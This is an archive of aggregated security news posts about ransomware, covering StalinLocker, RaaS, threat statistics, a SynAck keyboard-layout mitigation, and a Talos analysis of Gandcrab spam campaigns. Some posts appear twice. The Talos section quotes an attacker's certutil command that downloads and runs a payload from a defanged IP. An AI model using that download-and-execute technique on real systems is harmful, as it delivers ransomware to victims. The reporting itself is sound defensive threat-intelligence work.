Category Archives: ransomware

Fighting ransomware with network segmentation as a path to resiliency

Recent cybersecurity events involving the use of ransomware (WannaCry and similar variants) represent the latest examples highlighting the need for organizations to not only take an initial hit, but survive, adapt, and endure. In other words, be resilient. All too often, our community is a witness to any number of similar events where an initial breach leads to catastrophic effects across the enterprise. We need to do better; the methodologies and tools to do so … More

The post Fighting ransomware with network segmentation as a path to resiliency appeared first on Help Net Security.

E Hacking News – Latest Hacker News and IT Security News: A new ransomware has been discovered called StalinLocker, or StalinScreamer, tha…

A new ransomware has been discovered called StalinLocker, or StalinScreamer, that gives victims of the attack 10 minutes to put in the correct unlock code and if they’re not able to do that, erases all the data on the infected device.

The ransomware does not actually demand any ransom, other than the condition given to unlock the victim’s device.

Named after Joseph Stalin, the late leader of the Soviet Union, the malware pays tribute to him by showing a red screen with a picture of Stalin, along with the USSR anthem playing in the background, when StalinLocker takes over the computer and the 10 minute countdown begins.

The ransomware was discovered by MalwareHunterTeam, which on Twitter explained how the malware worked and how to know the code to unlock your locked device.

According to them, the code can be guessed by subtracting the date the malware was run by 30/12/1922, which is the date that represents the foundation of the USSR.

This ransomware, unlike others, seems to purely focus on destroying user data as it does not demand any ransom in Bitcoin or other ways but simply attempts to erase all data if conditions are not met. If the user correctly enters the code, however, the files are unlocked with no problem.

The malware is similar to a previous one that forced victims to PlayerUnknown’s Battlegrounds game for an hour to get their device unlocked, but unlike StalinLocker, it did not threaten the erasure of the victim’s data.

Currently, StalinLocker is in a testing stage but it could turn out to be a major problem for Windows users once it is out for good.

E Hacking News - Latest Hacker News and IT Security News

StalinLocker: ransomeware deletes data if correct code is not put in time

A new ransomware has been discovered called StalinLocker, or StalinScreamer, that gives victims of the attack 10 minutes to put in the correct unlock code and if they’re not able to do that, erases all the data on the infected device.

The ransomware does not actually demand any ransom, other than the condition given to unlock the victim’s device.

Named after Joseph Stalin, the late leader of the Soviet Union, the malware pays tribute to him by showing a red screen with a picture of Stalin, along with the USSR anthem playing in the background, when StalinLocker takes over the computer and the 10 minute countdown begins.

The ransomware was discovered by MalwareHunterTeam, which on Twitter explained how the malware worked and how to know the code to unlock your locked device.

According to them, the code can be guessed by subtracting the date the malware was run by 30/12/1922, which is the date that represents the foundation of the USSR.

This ransomware, unlike others, seems to purely focus on destroying user data as it does not demand any ransom in Bitcoin or other ways but simply attempts to erase all data if conditions are not met. If the user correctly enters the code, however, the files are unlocked with no problem.

The malware is similar to a previous one that forced victims to PlayerUnknown’s Battlegrounds game for an hour to get their device unlocked, but unlike StalinLocker, it did not threaten the erasure of the victim’s data.

Currently, StalinLocker is in a testing stage but it could turn out to be a major problem for Windows users once it is out for good.

Cybersecurity Threats in 2018: Cryptojacking, Ransomware and a Divided Zero-Day Market

Data from the first quarter of 2018 revealed that the cybersecurity threats landscape is changing. As noted by CSO Online, cryptojacking continues to gain ground: In the first quarter of 2018, 28 percent of companies reported crypto-mining malware, up from just 13 percent in Q4 2017.

According to Nasdaq, meanwhile, ransomware remains a critical threat. BlackRuby, SamSam and GandCrab all made an impact over the last three months, with GandCrab’s ransom demand marking the first time malicious actors asked for payment in Dash digital currency.

But there’s another story here: The growing division (and multiplication) of the zero-day market.

The Attack Surface Expands

As Computer Weekly reported, the total number of malware families grew by 25 percent last quarter while unique variants saw a 19 percent boost. In addition, cybercriminals are now taking the time to conduct reconnaissance on potential targets and leverage automation to maximize attack impact. The Nasdaq piece pointed to the Olympic Destroyer malware, which was specifically designed to interfere with the global sporting event in Pyeongchang this year.

Corporate attack surfaces are also expanding thanks to the uptake of Internet of Things (IoT) technologies. Three of the top 20 reported cybersecurity threats last quarter targeted these devices. Although 60 percent of all web traffic is now encrypted, this “represents a real challenge for traditional security technology that has no way of filtering encrypted traffic.” So it’s no surprise that zero-day threats haven’t received as much attention, even as the market for discovery and distribution evolves.

No Zero-Sum Game

According to Fortinet’s “Threat Landscape Report Q1 2018,” the zero-day market is maturing. While there were 214 zero-day threats discovered in all of 2017, 45 were found in Q1 2018 alone, affecting everything from popular content management systems (CMSs) to device makers and industry-leading operating system (OS) developers. Division of the market by “hat” — white-, gray- and black-hat IT experts — has produced three distinct zero-day streams:

  • White hat — This market supports bug bounty programs, which pay law-abiding security professionals to find new vulnerabilities, but secure disclosure and patching of these exploits is critical to limit accidental exposure.
  • Grey hatHere, zero-day “brokers” purchase bugs for customers. The caveat is that these customers are typically anonymous. The Fortinet report noted that it’s “possible that the buyer is a hostile nation-state, cybercriminal enterprise or otherwise maliciously inclined.”
  • Black hatFor black-hat actors, the goal is to both find and create new zero-day exploits for profit, and threat researchers have confirmed that “the creation and distribution of zero days by cybercriminals is on the rise.”

This triple-threat market adds up to a kind of multiplicative effect: Companies concerned about zero-day bugs invest more money into white-hat programs to find and eliminate them, while for-profit gray- and black-hat actors look to discover and create new bugs to continue the cycle.

Transformative Cybersecurity Threats

The Fortinet report emphasized that the rise of malware innovation, IoT risks, cryptojacking and zero-day threats “points to the continued transformation of cybercrime.” Specifically, companies need to do the math on zero-day exploits — division of outcomes, combined with multiplying interest, makes this a market to watch in 2018.

The post Cybersecurity Threats in 2018: Cryptojacking, Ransomware and a Divided Zero-Day Market appeared first on Security Intelligence.

Ransomware-as-a-Service (RaaS): How It Works

Ransomware isn’t a new threat to the cyber world. Its origins go back many years now. Over time, this threat has become only more vicious and harmful. While people were trying to deal with this cyber threat, cybercriminals moved one step further by offering ransomware-as-a-service (RaaS). Under this service, cybercriminals provide a compact malicious kit […]… Read More

The post Ransomware-as-a-Service (RaaS): How It Works appeared first on The State of Security.

The State of Security: Ransomware-as-a-Service (RaaS): How It Works

Ransomware isn’t a new threat to the cyber world. Its origins go back many years now. Over time, this threat has become only more vicious and harmful. While people were trying to deal with this cyber threat, cybercriminals moved one step further by offering ransomware-as-a-service (RaaS). Under this service, cybercriminals provide a compact malicious kit […]… Read More

The post Ransomware-as-a-Service (RaaS): How It Works appeared first on The State of Security.

The State of Security

New Threat Intelligence Reveals That Simple Cyberthreats Remain Successful

Despite the rise of Internet of Things (IoT) networks and always-connected mobile devices, cybercriminals are sticking with tried-and-true strategies.

As noted by BetaNews, email phishing and drive-by downloads were the most common threat vectors of 2017, maintaining their top spots from the year before. New threat intelligence data also revealed a threefold increase in ransomware over the last year fueled in large part by variants such as NotPetya and WannaCry.

Industry Cybercrime Trends

ZDNet reported that healthcare was the primary target for ransomware scams last year. In fact, 8 of the top 10 ransomware families were consistently involved in healthcare attacks.

The food industry, meanwhile, topped threat actors’ priority list and attracted 50 percent of all reported attacks, down just 1 percent from 2016, according to the “Cylance 2017 Threat Report.” In 2017, hospitality moved into second spot with 19 percent.

On the attacker side of threat intelligence, the market is shifting gears to offer ransomware-as-a-service (RaaS) tools that would-be cybercriminals can purchase for less than $50. The authors simply take a percentage of any successful ransomware scheme.

Threat Actors Keep It Simple

As noted by the Cylance report, simple techniques, such as phishing, and common malware strains, such as Locky, continue to pay off for attackers. Reported but unpatched vulnerabilities are one problem: With multiple malware strains now available for a reasonable price, malicious actors can easily find software designed to exploit known issues.

Also consider the use of Locky ransomware, which remains largely unchanged since its inception. According to the report, “This old malware didn’t need to take a new approach. The authors behind Locky just had to tweak the only part of the process that can never be fixed — the end user.”

Despite the success of tried-and-true attacks, however, Forbes pointed out that there’s also an uptick in “single-use, highly targeted malware attacks.” This code is designed to carry out a singular purpose on corporate networks and isn’t active in the wild. Instead, it activates once and only once to complete its assigned task.

In fact, 70 percent of the attacked blocked by Cylance were never seen again. As a result, existing lists of malicious code, such as CVE, won’t list this kind of custom-built malware, making it possible for attackers to act with greater impunity. The Cylance report put it simply: “The fact of the matter is that public repositories of signatures are by no means comprehensive, complete, up to date or a reliable record of all the malware that could impact an organization.”

In addition, crypto-mining efforts are gaining ground since many security tools don’t recognize this lightweight software as threatening and visible impact to networks is often minimal. As noted by the Cylance report, crypto-mining tools saw a 504 percent boost through 2017 and are on track for similar growth this year.

Threat Intelligence Takeaway

While more threat actors are designing custom-built malware to beat corporate defenses, the bulk of attacks leverage well-known ransomware tools and common threat vectors. Phishing and drive-by downloads continue to work as employees struggle to identify scam email efforts and malicious links, while the rise of crypto-mining tools reduces the complexity of new attacks.

The bottom line is that while sophisticated software is on the rise, simple remains successful for malicious actors.

The post New Threat Intelligence Reveals That Simple Cyberthreats Remain Successful appeared first on Security Intelligence.

Syn/Ack Unique Proactive Protection Technique

McAfee’s Advanced Threat Research team has performed analysis on samples of Syn/Ack ransomware implementing Process Doppelgänging.  For those who are concerned about the potential impact of this ransomware but are currently unable to implement McAfee product protections, we have found a simple but interesting alternative method.  Prior to encryption and ransom, the malware first checks if one of several hardcoded keyboards or languages is installed on the target machine.  If found, the malicious code will terminate, effectively resulting in an extremely simple “patch” of sorts. We have tested the following steps to be effective on several versions of Windows 7 and theoretically on Windows 10 – preventing the malware from encryption and ransom.  These steps can be taken proactively.  Due to limited scope of testing at this time, this technique may not work on all systems, release versions, and configurations.

Windows 7 – Adding Keyboard Layout:

Control Panel > Clock, Language, and Region > Region and Language > Keyboards and Languages

Click the “Change Keyboards” tab

In the Installed Services section click “add”

Select Keyboard – For example: Russian (Russia) > Keyboard > Russian

Click “Ok”

Click “Apply”

Click “Ok”

Here is the list of keyboards layouts you can add – any will suffice:

  • Armenian
  • Azeri, (Cyrillic, Azerbaijan)
  • Belarusian
  • Georgian
  • Kazakh
  • Ukrainian
  • Uzbek (Cryillic, Uzbekistan)
  • Uzbek (Latin,Uzbekistan)
  • Russian
  • Tajik

Windows 10 – Adding Language Support:

Control Panel > Language > Add a language

  • Armenian
  • Azeri, (Cyrillic, Azerbaijan)
  • Belarusian
  • Georgian
  • Kazakh
  • Ukrainian
  • Uzbek (Cryillic, Uzbekistan)
  • Uzbek (Latin,Uzbekistan)
  • Russian
  • Tajik

That’s all it takes!  Please note – this should not be considered a fully effective or long-term strategy.  It is highly likely the malware will change based on this finding; thus, we recommend the McAfee product protections referenced above for best effect.

The post Syn/Ack Unique Proactive Protection Technique appeared first on McAfee Blogs.

Security newsround: May 2018

We round up reporting and research from across the web about the latest security news and developments. This month: police success against cyber villains, the value of personal data, IoT security, a new ransomware strain, a new security framework and Gmail goes for 2FA.

Law’s long arm collars cyber crooks

Police forces scored three big wins against various cybercrime operations recently. In late April, authorities took down, one of the world’s most popular marketplaces for launching DDoS attacks. Reuters reported that WebStresser was behind attacks on seven of Britain’s largest banks last November. The service is also alleged to have been responsible for four million attacks since 2015 against governments, police services, and businesses.

The Dutch Politie and the UK’s National Crime Agency led ‘Operation Power Off’, supported by Europol and a dozen other law enforcement agencies. They arrested alleged WebStresser administrators in four countries, seized infrastructure, and took unspecified “further measures” against some of its top users.

Before police pulled the plug, WebStresser had amassed 136,000 registered users. Threatpost aptly described WebStresser as a “criminal fantasy dream site”. It reported that there are 6.5 million DDoS attacks per year on average, earning attackers $13 million in revenue.

In separate operations, a coalition of eight countries led by Belgium took down propaganda broadcasting infrastructure of the Islamic State. Authorities targeted web assets of Amaq News Agency, an online media outlet which authorities called “the main mouthpiece of IS”. The same action also took down other IS-branded media outlets.

Completing the hat-trick, cybercrime teams from Dutch police seized the Anon-IB forum in an investigation relating to criminal offences. Vice Motherboard described Anon-IB as “possibly the most infamous site focused on revenge porn – explicit or intimate images of people shared without their consent”.

We’re always pleased to see law enforcement prevail in the fight against cybercrime. BH Consulting has been a partner of Europol for years. In 2013, our CEO Brian Honan was appointed as a special advisor on internet security to Europol’s CyberCrime Centre (EC3).

What’s your data worth?

If data is the new oil, there’s no shortage of ways that criminals can refine it for profit. As this post from Dark Reading makes clear, stolen data has many purposes that security teams need to know about. Crimes range from stolen IP to filing fraudulent tax rebates to schemes for stealing money, Steve Zurier wrote. Once hackers hold an inventory of stolen data , they package up and sell personal information such as names, addresses, phone numbers, and email addresses. They usually sell this data in bulk to maximise their profits. The more recent the records, the more value they fetch on the black market, Zurier said.

The question of what our data is worth in the digital economy is especially resonant and relevant in light of the recent Facebook/Cambridge Analytica scandal. Not to mention a certain four-letter privacy regulation. In Medium, Rik Ferguson of Trend Micro wrote a thoughtful post that considers the value of our personal information in the online economy. Data, he wrote, “unlike oil … is not burned up when used, but can be sold and resold, mined and reused”.

There’s plenty to chew on for privacy and security professionals. Rik wrote: “Our data is cataloged and combined with the traces we leave behind in the physical world, correlated and mined to reach conclusions far beyond those we might perhaps be comfortable with publicising, and then sold as a commodity or a subscription-based service to any interested party. It is an industry based our ignorance and our nonchalance.”

Securing all the things

ENISA has developed a free interactive tool based on its baseline security recommendations for the Internet of Things. This lets anyone working on IoT projects search and identify good practices. The tool is available to download here, and this page also includes a help guide. It’s based on the agency’s original study on IoT security which it published last year. The new tool is timely, as criminals have apparently begun exploiting IoT as another way to profit from cryptocurrency mining. Trend Micro researchers identified malware that hijacks the processing power of IoT devices and smartphones to mine for cryptocurrency. As Lesley Carhart of Dragos jokingly tweeted: “Your router and your IOT thermostat should really beep like your smoke detector when it’s missing a critical security patch.”

Prepare for a summer of SamSam?

Researchers are warning of criminals taking a new approach to ransomware infections. Sophos analysed the SamSam variant and found criminals carefully choose target organisations. They then launch thousands of copies of SamSam onto that organisation’s computers all at once. Once the infection has hit, the criminals offer victims a volume discount to clean all machines. This differs from the usual spam-like scattergun approach to ransomware of sending one malware copy to multiple possible targets. “The cybercriminals behind SamSam use vulnerabilities to gain access to the victims’ network or use brute-force tactics against the weak passwords of the Remote Desktop Protocol (RDP)”, the researchers wrote. Here’s ThreatPost’s writeup of the research. Sophos’ own blog describes the findings, and here’s a link to the technical paper.

Guidelines in the NIST

The US National Institute of Standards and Technology (NIST) has released version 1.1 of its Framework for Improving Critical Infrastructure Cybersecurity. This updates the original version 1.0 which proved popular on its release in February 2014. Version 1.1’s updated guidelines cover authentication and identity, cybersecurity risk self assessment, supply chain security management, and vulnerability disclosure. NIST programme manager Matt Barrett said the framework is flexible enough to meet an individual organisation’s business or mission needs. It applies to a wide range of technology environments such as information technology, industrial control systems and the Internet of Things. Later this year, NIST will release an updated companion document, the Roadmap for Improving Critical Infrastructure Cybersecurity. NIST’s press release is here and the framework is available free in PDF at this link.

Google beefs up Gmail security

Two-factor authentication got a shot in the arm after Google added this security feature for its Gmail app last month. Also called two-step verification, this sends a prompt to a user’s phone when they access their Gmail account on another computer. Naked Security said this is more secure than sending an SMS code to the phone, which can be vulnerable to fraud. It also pointed out that ease of use will encourage more people to use it, as takeup of 2FA to date has been low. Why does this matter? Here’s how many Gmail users there are in the world: 1.2 billion, to be exact. Google has more details on its blog. If you or your users still prefer passwords, here’s our advice from last year on how to choose better ones.


The post Security newsround: May 2018 appeared first on BH Consulting.

The Behavioral Intelligence Officer

With the advent of increased cyber security related threats, the majority of attacks point to one target, and that is the human element. Examine any survey relating to cyber security threats faced by organizations from ransomware to phishing, and these attacks all have one target in common: the human element is necessary to trigger the […]… Read More

The post The Behavioral Intelligence Officer appeared first on The State of Security.

Crypto-Mining, IoT Attacks Among Top Internet Security Threats in 2018

Crypto-mining is up, Internet of Things (IoT) attacks are on the rise and ransomware is undergoing a “market correction,” according to recent research. As noted by TechRepublic, new data on internet security threats revealed an 8,500 percent jump in the volume of crypto-mining efforts while criminal IoT compromises grew by 600 percent over the previous year.

Ransomware Saturates the Cybercrime Market

According to Security Boulevard, ransomware is now considered a commodity with the rise of cybercrime-as-a-service options, which enable would-be hackers with no technical experience to rent their own versions of popular ransomware.

The increased availability of ransomware tools caused the average ransom fee to drop to $522 in 2017, less than half of what the average cybercriminal demanded in 2016. Still, organizations should expect the sheer number of ransomware attacks leveraging commonly available tools to rise in 2018.

Crypto-Mining Headlines Top Internet Security Threats of 2018

Crypto-mining experienced the largest boost of all internet security threats last year with an 8,500 percent jump, according to Symantec’s “2018 Internet Security Threat Report.” With just a few lines of code, attackers can install crypto-mining software on unsuspecting devices and dig for digital coins in the background.

The lightweight nature of crypto-mining code enables it to fly under the radar of typical threat detection tools even as it consumes central processing unit (CPU) cycles and energy. As more miners are installed on network and IoT devices, performance suffers, energy costs rise and cloud resources are maxed out.

The TechRepublic article likened the rise of crypto-mining to the get-rich-quick lure of 19th century gold rushes and cautioned that new technology designed to combat IoT attacks “will not be enough to stop them all.” Recognizing the telltale signs of a IoT-driven crypto-mining attack, therefore, requires a “well-informed and well-trained workforce.”

Supply Chains in the Crosshairs

As noted in the Symantec report, supply chain attacks are on the rise. These incidents increased by 200 percent in 2017 as cybercriminals looked for ways to compromise valuable corporate systems.

In supply chain attacks, threat actors don’t typically target suppliers directly. Instead, they use them to bypass enterprise network security. For example, NotPetya leveraged flaws in Ukranian accounting software to access larger, more valuable systems.

What’s more, primary targets may not be aware that supply chain partners have been compromised until it’s too late. According to the Security Boulevard piece, companies must ensure that suppliers don’t “walk around cybersecurity controls,” but instead meet all applicable standards.

Zero-Day Exploits Decline as Targeted Attacks Rise

Finally, while zero-day exploits are declining, targeted attacks are on the rise. For example, spear phishing, a technique employed by 71 percent of cybercrime groups last year, is now the top threat vector, according to Symantec. That’s because it works: stealing credentials and bypassing security systems is much easier than fighting with firewalls.

The post Crypto-Mining, IoT Attacks Among Top Internet Security Threats in 2018 appeared first on Security Intelligence.

Gandcrab Ransomware Walks its Way onto Compromised Sites

This blog post authored by Nick Biasini with contributions from Nick Lister and Christopher Marczewski.

Despite the recent decline in the prevalence of ransomware in the threat landscape, Cisco Talos has been monitoring the now widely distributed ransomware called Gandcrab. Gandcrab uses both traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft. While we've seen cryptocurrency miners overtake ransomware as the most popular malware on the threat landscape, Gandcrab is proof that ransomware can still strike at any time.

While investigating a recent spam campaign Talos found a series of compromised websites that were being used to deliver Gandcrab. This malware is the latest in a long line of examples of why stopping malware distribution is a problem, and shows why securing websites is both an arduous and necessary task. As a clear example of how challenging resolving these issues can be, one of the sites — despite being shut down briefly — was seen serving Gandcrab not once, but twice, over a few days.

The first campaign

Beginning on April 30, 2018, Talos began observing a large-scale spam campaign that disguised itself as an online order. The subject used during this campaign was "Your Order #{Random Digits}" (i.e. Your Order #99627). A sample of the email can be seen below.

You can see above that there is a limited body and an attached ZIP file. The attached ZIP file contains a Word document. This Word document contains a macro that downloads and executes the Gandcrab ransomware. In this particular instance, the malware was being downloaded from the path below:
During the course of the campaign, we also saw emails that included VBScript files instead of a ZIP file. The end result is the same, with the payload being pulled off of the server. One of the interesting aspects to this malware is the system tools used to download the payload. There are lots of different ways that the payload can be downloaded using macros, but this particular campaign used a somewhat novel approach of leveraging certutil.exe. Certutil.exe is a command line utility that is installed as part of Certificate Services. This campaign leveraged it to allow for the downloading of a malicious payload. The specific syntax used is shown below:
certutil.exe -urlcache -split -f hxxp://185.189.58[.]222/bam.exe C:\Users\ADMINI~1\AppData\Local\Temp\FVAacW.exe
The -urlcache flag is designed to be used to display or delete URL-cached entries. However, by leveraging the -f and -split flags, the adversaries are able to force the URL to be downloaded to the location shown above. We have seen this technique used periodically by attackers, but it isn't commonly utilized. The file is then executed, and Gandcrab is installed on the target system.

Same campaign, different location

A couple days after the initial wave of this campaign, a second one started up. Beginning on May 2, Talos observed another wave of emails that were using an almost identical campaign. The subjects, bodies, and attachments were almost identical. There was one subtle change: the location the payload was being hosted. Initially, it appeared to be another random host as the get request to retrieve the malware is shown below:
We began investigating this a little further, and found when looking at DNS that this was in fact an actual legitimate website (www[.]pushpakcourier[.]net) and validated it by successfully downloading the payload from hxxp://www[.]pushpakcourier[.]net/js/kukul.exe. The website itself appears to be a courier company based out of India.

We were able to quickly determine that the website was running phpMyAdmin. We began looking a little deeper at what possible vulnerabilities could exist, and we ran into a large amount, including default credentials and multiple MySQL vulnerabilities that could be leveraged. Shortly after this was discovered, the website was taken down. Talos also attempted to directly reach out to the owners to help aid them in identifying where the threat originated from and the scope of the downloads.

This incident helps shed more light onto one of the biggest challenges we face: compromised websites. There are a huge amount of web pages available on the internet, and many of them are running on antiquated software. Most small businesses aren't aware that a new vulnerability has been released against a web framework and even if they did, most lack the expertise and time to be able to frequently update the software that the companies' websites rely upon.

Adversaries, on the other hand, are able to quickly leverage these vulnerabilities and begin widely scanning the internet looking for potential victims. Leveraging these compromised sites in these types of spam campaigns is increasingly effective because adversaries don't need to maintain persistence, or do much of anything other than copying a file to a specific location that they can point to systems, allowing for infection.

Another day, more lazy spammers

Shortly after the previous two campaigns, we spotted a third — again using the same basic subject, body and attachment types. This time, they ditched the IPs and started pulling the malware from another likely compromised site using the domain this time.
This particular site appears to be a Wordpress site, which has a plethora of vulnerabilities against it that could be leveraged. A little further digging revealed that they were running a version of Wordpress that was more than a year out of date. Additionally, Talos found that this particular site had been leveraged in the past to serve Gandcrab. This is yet another example of how compromised websites will continue to be leveraged to serve malware. This allows adversaries to save time and money, doing things like registering domains, buying VPS, and configuring a web server to host the files. The added advantage is that they also get to leverage the web reputation of the site they compromise, which could help bypass some blacklisting technologies, at least initially.

In both cases, these websites are using older versions of software and have publicly exposed the admin pages for the web frameworks they are utilizing. These are both common things that website admins miss when they are setting up a small company site. Ensuring that the administrative pages are protected and the software is patched is paramount to preventing adversaries from gaining access to serve malware.

Same site, different campaign

On May 5 and 7, Talos saw another set of spam campaigns launched using this same template again. These particular spammers are not putting much effort into making the campaigns unique. Over the course of several days, we repeatedly saw the same basic email with the malware being hosted in different locations. These campaigns are no exception, except the websites aren't new. As shown below, the adversaries have returned to the same sites they were leveraging just days earlier. This is despite the fact that the websites were taken down, likely due to malware being hosted.
Over the course of a week, we saw four different spam campaigns leveraging compromised websites, and in some cases returning to the same sites, despite attempted cleaning. This is a clear example of the challenges that face small businesses while trying to support a website for their organizations. Adversaries are quick to identify both vulnerabilities and exposed admin pages to leverage to distribute malware around the world.


Gandcrab is one of the most widely distributed ransomware variants today. It is under almost constant development, with its creators releasing new versions at an aggressive pace. Its basic functionality has been well documented. It does the typical things ransomware does, including encrypting files with the .CRAB extension, changing the user's background, and leveraging Tor for communication.

One of the interesting elements of Gandcrab is its use of namecoin domains for command and control (C2) communication. These are easily identified by the .bit top level domain (TLD). Increasingly, adversaries rely on Tor and namecoin domains to help evade identification. Namecoin is a decentralized DNS service that does not rely on a central authority instead of relying on a peer-to-peer network. This increases the difficulty associated with getting domains shut down and identifying those that are potentially behind them.

Namecoin domains provide another example of why DNS should be locked down in enterprise environments. Since namecoin relies on blockchain to provide authoritative responses, standard DNS servers are typically not effective at serving .bit domains. If an enterprise blocks all unauthorized DNS server access, most .bit domains will be blocked. We have already started to see proxy services similar to tor2web start to emerge for .bit TLDs.


With billions of dollars at stakes in the ransomware field, threats like Gandcrab are going to continue to emerge time and time again. There are millions and millions of web pages running on platforms that have thousands of vulnerabilities. Since most of these pages are created and maintained by small organizations that don't have the knowledge or resources to react to emerging vulnerabilities, this will continue to be a problem for the foreseeable future. As long as adversaries are able to hide their malware on legitimate sites, web reputation systems are going to be compromised.

The other thing we can learn from Gandcrab is that ransomware isn't going anywhere, even with the rise in the popularity of cryptocurrency miners. Adversaries are always going to follow money, whether its ransomware or malicious crypto miners, the bad guys are always looking to make a quick dollar. Some of the biggest challenges we face as a security community is the leveraging of compromised websites to distribute malware.


Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on


Email Subject:
Your Order #{Random Digits}

Gandcrab Hashes:

C2 Domains:

Compromised Domains:

Crypto-Miners Supplant Ransomware as the Top Healthcare Cybersecurity Threat

Malicious crypto-miners have supplanted ransomware as the top healthcare cybersecurity threat, a cross-sector report revealed.

The April 2018 edition of the Healthcare Information and Management Systems Society (HIMSS)’s “Healthcare and Cross-Sector Cybersecurity Report,” which referenced the recent “Comodo Cybersecurity Q1 2018 Report,” found that crypto-miner attacks increased over the course of the quarter while ransomware attacks decreased.

Comodo’s researchers also noted that attackers are debuting innovations for embedding malware within crypto-miners, a trend that could indicate a preference among bad actors for cryptojacking over more traditional threats.

Crypto-Miners, Backdoors and More

On June 11 at the Healthcare Security Forum, Lee Kim, privacy and security director for HIMSS, will present her a talk titled “Through the Looking Glass: What’s Happening Now and in the Future.” Her session will expand on some of the findings from the April 2018 HIMSS report.

In addition to crypto-miners, HIMSS featured other threats in its roundup, including an authentication bypass vulnerability that facilitates code execution with root privileges on some ASUS routers. The report noted that public exploits are readily available for this weakness.

HIMSS also covered a threat group targeting healthcare firms with a custom backdoor, a remote code execution vulnerability in the 7-Zip program and a Python-based crypto-miner that uses the ETERNALROMANCE exploit to spread to vulnerable Windows PCs.

Improving Healthcare Cybersecurity, One Asset at a Time

Ahead of her presentation at the Healthcare Security Forum, Lee advised healthcare organizations to take inventory of their assets’ locations and configurations. That way, security teams will be in a better position to defend the network from national-state actors, criminals and zealous competitors.

“Think like an attacker and a defender,” she advised, as quoted by Healthcare IT News. “Know how the enemy moves, what they go after, and who they may be — this intelligence can go a long way.”

Lee also emphasized the importance of establishing communication channels for defending against phishing emails.

The post Crypto-Miners Supplant Ransomware as the Top Healthcare Cybersecurity Threat appeared first on Security Intelligence.

A week in security (April 30 – May 6)

Last week on Labs, we examined the Spartacus ransomware, reported about a new tactic used by the Necurs malspam campaign, informed you about the recommended Twitter password change, and discussed engaging students to start considering careers in cybersecurity.

Other news

  • NTML credentials can be stolen via malicious Portable Document Format (PDF) files without any user interaction. (Source: SecurityWeek)
  • Twitter sold data access to a Cambridge Analytica-linked researcher. (Source: Bloomberg)
  • FacexWorm targets cryptocurrency users by spreading through Facebook Messenger. (Source: Security Affairs)
  • New DNS encryption tools accelerate privacy online. (Source: HelpNetSecurity)
  • IoT security: Is cryptocurrency-mining malware your next big headache? (Source: ZDNet)
  • Companies from across the tech spectrum are lining up to protest the measure that would allow them to “hack back” with offensive initiatives in the face of a cyberattack. (Source: ThreatPost)
  • Drive-by Rowhammer attack uses GPU to compromise Android phone. (Source: ArsTechnica)
  • The systems that control water and power plants are shockingly vulnerable to hackers. (Source: Gizmodo)
  • Facebook’s dating service is a chance to meet the catfisher, advertiser, or scammer of your dreams. (Source: Washington Post)
  • Roskomnadzor, Russia’s telecommunications watchdog, blocks 50 VPNs and Proxy Services providing access to Telegram. (Source: BleepingComputer)
  • Cat burglar: Kitty cryptominer targets web application servers, then spreads to app users. (Source: SCMagazine)

Stay safe, everyone!

The post A week in security (April 30 – May 6) appeared first on Malwarebytes Labs.

Despite Last Year’s Surge, Ransomware Attacks on the Decline in 2018

Although major, widespread campaigns such as WannaCry drove a 415 percent increase in ransomware attacks last year, recent research revealed that the threat vector is fading in 2018.

F-Secure’s “The Changing State of Ransomware” report found that the lack of big paydays for even the most headline-worthy campaigns has led to a gradual decline in these types of attacks. Users recognize that even paying up doesn’t guarantee the safe return of data.

Ransomware News Revolves Around WannaCry in 2017

2017 was an interesting year for ransomware. Strains such as Locky, Mole, Cerber and CryptoLocker remained popular and the number of new malware families increased by 62 percent to reach 343 strains worldwide last year. However, F-Secure Security Advisor Sean Sullivan noted that this type of activity began to taper off after last summer and that the “ransomware gold rush mentality is over.”

The exception was WannaCry, which accounted for 90 percent of all ransomware attacks reported in 2017. The first wave of these attacks was stifled by the discover of a kill switch. While this gave security professionals time to regroup, it didn’t stop subsequent infections because WannaCry spread like a worm across vulnerable SMB ports — the more hosts it infected, the greater its reach.

This not only bolstered second-wave WannaCry numbers, but it also led to the development of unique variations, some of which kept the worm qualities but ditched the encryption. F-secure noted that these variants made the impact “less noticeable for victims” but still caused problems “in the way of downtime and service outages due to the worm’s bandwidth consumption.”

Emerging Trends in Ransomware Attacks

The report also touched on emerging trends, such as the shift toward crypto-mining thanks to bitcoin value gains through 2017. Crypto-mining malware leverages unused central processing unit (CPU) cycles and “draws considerably less attention than ransomware,” according to the report. Attackers are also adjusting their aim and targeting corporate environments instead of individuals since enterprises offer better potential returns.

Finally, the report pointed out that while WannaCry — and, to a lesser extent, Locky — “dominate prevalence statistics,” they aren’t necessarily the most successful ransomware attacks. WannaCry only raked in around $140,000, but a unique Linux variant of the Erebus ransomware nabbed a $1 million payout for attackers last year from a South Korean web hosting firm.

The bottom line is that although WannaCry had the greatest reach and staying power in 2017, attackers are now shifting gears to create targeted corporate campaigns and leverage crypto-mining tools.

The post Despite Last Year’s Surge, Ransomware Attacks on the Decline in 2018 appeared first on Security Intelligence.

First-Ever Ransomware Found Using ‘Process Doppelgänging’ Attack to Evade Detection

Security researchers have spotted the first-ever ransomware exploiting Process Doppelgänging, a new fileless code injection technique that could help malware evade detection. The Process Doppelgänging attack takes advantage of a built-in Windows function, i.e., NTFS Transactions, and an outdated implementation of Windows process loader, and works on all modern versions of Microsoft Windows OS

SynAck targeted ransomware uses the Doppelgänging technique

The Process Doppelgänging technique was first presented in December 2017 at the BlackHat conference. Since the presentation several threat actors have started using this sophisticated technique in an attempt to bypass modern security solutions.

In April 2018, we spotted the first ransomware employing this bypass technique – SynAck ransomware. It should be noted that SynAck is not new – it has been known since at least September 2017 – but a recently discovered sample caught our attention after it was found to be using Process Doppelgänging. Here we present the results of our investigation of this new SynAck variant.

Anti-analysis and anti-detection techniques

Process Doppelgänging

SynAck ransomware uses this technique in an attempt to bypass modern security solutions. The main purpose of the technique is to use NTFS transactions to launch a malicious process from the transacted file so that the malicious process looks like a legitimate one.

Part of the procedure that implements Process Doppelgänging

Binary obfuscation

